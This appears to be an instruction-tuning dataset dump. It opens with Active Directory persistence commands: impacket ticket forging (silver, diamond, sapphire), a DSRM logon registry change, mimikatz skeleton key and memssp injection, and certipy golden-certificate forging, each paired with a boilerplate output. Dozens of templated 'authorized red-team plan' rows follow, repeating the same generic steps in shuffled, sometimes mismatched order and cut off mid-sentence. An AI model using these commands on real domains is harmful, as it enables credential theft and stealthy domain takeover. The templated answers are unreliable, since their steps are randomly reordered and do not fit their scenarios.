instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Silver Ticket
ticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser>
Note or procedural step under 'Silver Ticket'.
Silver Ticket
Directory Service Restore Mode (DSRM)\
Note or procedural step under 'Silver Ticket'.
Silver Ticket
PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Note or procedural step under 'Silver Ticket'.
Skeleton Key
mimikatz "privilege::debug" "misc::skeleton" "exit" #password is mimikatz
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Custom SSP
mimikatz "privilege::debug" "misc::memssp" "exit"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Custom SSP
C:\Windows\System32\kiwissp.log
Note or procedural step under 'Custom SSP'.
Golden certificate
certipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash>
Note or procedural step under 'Golden certificate'.
Golden certificate
certipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject 'CN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL>
Note or procedural step under 'Golden certificate'.
Diamond ticket
ticketer.py -request -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> -user-id <user_id> -groups '512,513,518,519,520' <anyuser>
Note or procedural step under 'Diamond ticket'.
Saphire Ticket
ticketer.py -request -impersonate <anyuser> -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> 'ignored'
Note or procedural step under 'Saphire Ticket'.
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Stolen VPN credential allowing remote access
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Map the local network perspective and identify what domain re...
Public-facing web app with possible misconfiguration: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Public-facing web app with possible misconfiguration
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Search non-destructively for credential material in u...
User opened document with embedded macro: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Assess potential for lateral movement from this host ...
Supplier/third-party compromise suspected: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Supplier/third-party compromise suspected
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Search non-destructively for credential material in u...
Supplier/third-party compromise suspected: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Supplier/third-party compromise suspected
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Map the local network perspective and identify w...
OAuth app consent token acquired: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Assess potential for lateral movement from this host and priorit...
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Map the local network perspective and identify what domain re...
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Coordinate with defenders to capture telemetry for each test ...
Compromised webmail session token obtained: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Search non-destructively for credential material in user profiles and browser stores. Step 4: Map the local network perspective and identify what...
OAuth app consent token acquired: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Coordinate with defenders to capture telemetry for each test ...
Exposed remote management interface reachable: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Exposed remote management interface reachable
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Search non-destructively for credential material in user profiles and browser stores. Step 4: Assess potential for lateral movement from this hos...
Supplier/third-party compromise suspected: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Supplier/third-party compromise suspected
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Search non-destructively for credential material in u...
Supplier/third-party compromise suspected: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Supplier/third-party compromise suspected
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Coordinate with defenders to capture telemetry for each test to...
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Search non-destructively for credential material in user profiles and browser stores. Step 4: Map the local network perspective and identify what domain ...
Compromised webmail session token obtained: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate visible services and shares without altering state to avoid noisy detection. Step 3: Search non-destructively for credential material in user profiles and browser stores. Step 4: Assess potential for lateral movement from this host and prio...
Stolen VPN credential allowing remote access: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Stolen VPN credential allowing remote access
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate visible services and shares without altering state to avoid noisy detection. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Map the local network perspective and identify wha...
OAuth app consent token acquired: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Coordinate with defenders to capture telemetry for each test ...
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate visible services and shares without altering state to avoid noisy detection. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Coordinate with defenders to capture telemetry for each test to...
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Search non-destructively for credential material in user profil...
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Search non-destructively for credential material...
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Map the local network perspective and identify what domain re...
Exposed remote management interface reachable: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Exposed remote management interface reachable
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Search non-destructively for credential material...
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate visible services and shares without altering state to avoid noisy detection. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Search non-destructively for credential material i...
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Assess potential for lateral movement from this host ...
Public-facing web app with possible misconfiguration: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Public-facing web app with possible misconfiguration
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Enumerate visible services and shares without altering state ...
User opened document with embedded macro: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Search non-destructively for credential material in user profiles and browser stores. Step 4: Coordinate with defenders to capture telemetry for each tes...
Phishing foothold on user workstation: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Phishing foothold on user workstation
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Search non-destructively for credential material in user profiles and browser stores. Step 4: Assess potential for lateral movement from this host and priorit...
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Map the local network perspective and identify what domain ...
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Coordinate with defenders to capture telemetry for each test ...
Stolen VPN credential allowing remote access: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Stolen VPN credential allowing remote access
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Map the local network perspective and identify what domain re...
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Search non-destructively for credential material in u...
Compromised webmail session token obtained: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Enumerate visible services and shares without alterin...
Exposed remote management interface reachable: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Exposed remote management interface reachable
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Search non-destructively for credential material in user profil...
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Stolen VPN credential allowing remote access
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Search non-destructively for credential material in user prof...
Public-facing web app with possible misconfiguration: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Public-facing web app with possible misconfiguration
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Coordinate with defenders to capture telemetry for each te...
User opened document with embedded macro: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Search non-destructively for credential material i...
Exposed remote management interface reachable: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Exposed remote management interface reachable
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Coordinate with defenders to capture telemetry for each tes...
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate visible services and shares without altering state to avoid noisy detection. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Map the local network perspective and identify wha...
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Search non-destructively for credential material i...
Supplier/third-party compromise suspected: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Supplier/third-party compromise suspected
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Assess potential for lateral movement from this host ...
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Stolen VPN credential allowing remote access
Step 1: Confirm authorization and scope before proceeding. Step 2: Search non-destructively for credential material in user profiles and browser stores. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Coordinate with defenders to capture telemetry for each test to ...
Supplier/third-party compromise suspected: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Supplier/third-party compromise suspected
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Search non-destructively for credential material in user p...
Public-facing web app with possible misconfiguration: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Public-facing web app with possible misconfiguration
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Map the local network perspective and identify w...
OAuth app consent token acquired: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate visible services and shares without altering state to avoid noisy detection. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Assess potential for lateral movement from this host and priori...
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
User opened document with embedded macro
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Enumerate visible services and shares without al...
Phishing foothold on user workstation: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Phishing foothold on user workstation
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Enumerate visible services and shares without alterin...
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Compromised webmail session token obtained
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate visible services and shares without altering state to avoid noisy detection. Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 4: Map the local network perspective and identify wha...
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 3: Enumerate visible services and shares without altering state to avoid noisy detection. Step 4: Coordinate with defenders to capture telemetry for each te...
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
OAuth app consent token acquired
Step 1: Confirm authorization and scope before proceeding. Step 2: Map the local network perspective and identify what domain resources are reachable. Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly. Step 4: Search non-destructively for credential material in user prof...
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Stolen VPN credential allowing remote access
Step 1: Confirm authorization and scope before proceeding. Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities. Step 3: Map the local network perspective and identify what domain resources are reachable. Step 4: Assess potential for lateral movement from this host ...
Domain-joined VM with read access to DC info: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Domain-joined VM with read access to DC info
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-foc...
Domain-joined VM with read access to DC info: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Domain-joined VM with read access to DC info
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Prioritize targets that are likely to yield credentials or privileged access. Step 4: Enumerate directory objects that are accessible and capture LDAP responses for ...
Network foothold with standard user rights: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Prioritize targets that are likely to yield credentials or pr...
Read-only view into asset inventory/CMDB: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Read-only view into asset inventory/CMDB
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Prioritize targets that are likely to yield credentials or privileged acc...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP response...
Access to a multi-share file server: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Access to a multi-share file server
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focu...
Domain-joined VM with read access to DC info: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Domain-joined VM with read access to DC info
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Prioritize targets that are likely to yield credentials or privileged acc...
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Read-only view into asset inventory/CMDB
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t...
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Access to a multi-share file server
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP respons...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Enumerate directory objects that are accessible and capture LDAP response...
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Read-only view into asset inventory/CMDB
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Prioritize targets that are likely to yield credentials or pr...
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the environm...
Network foothold with standard user rights: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Prioritize targets that are likely to yield credentials or pr...
Domain-joined VM with read access to DC info: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Domain-joined VM with read access to DC info
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Prioritize targets that are likely to yield credentials or privileged access. Step 4: Enumerate directory objects that are accessible and capture LDAP responses for ...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP respons...
Access to a multi-share file server: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Access to a multi-share file server
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP response...
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Prioritize targets that are likely to yield credentials or privileged acc...
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Access to a multi-share file server
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Prioritize targets that are likely to yield credentials or privileged access. Step 4: Enumerate directory objects that are accessible and capture LDAP respons...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP response...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Prioritize targets that are likely to yield credentials or privilege...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP respons...
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Access to a multi-share file server
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Prioritize targets that are likely to yield credentials or privileged access. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-...
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Access to a multi-share file server
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Prioritize targets that are likely to yield credentials or privileged access. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the environm...
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Read-only view into asset inventory/CMDB
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focu...
Network foothold with standard user rights: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t...
Network foothold with standard user rights: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the environm...
Domain-joined VM with read access to DC info: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Domain-joined VM with read access to DC info
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 3: Prioritize targets that are likely to yield credentials or privileged access. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the env...
Domain-joined VM with read access to DC info: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Domain-joined VM with read access to DC info
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Prioritize targets that are likely to yield credentials or privilege...
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Read-only view into asset inventory/CMDB
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 3: Prioritize targets that are likely to yield credentials or privileged access. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-foc...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
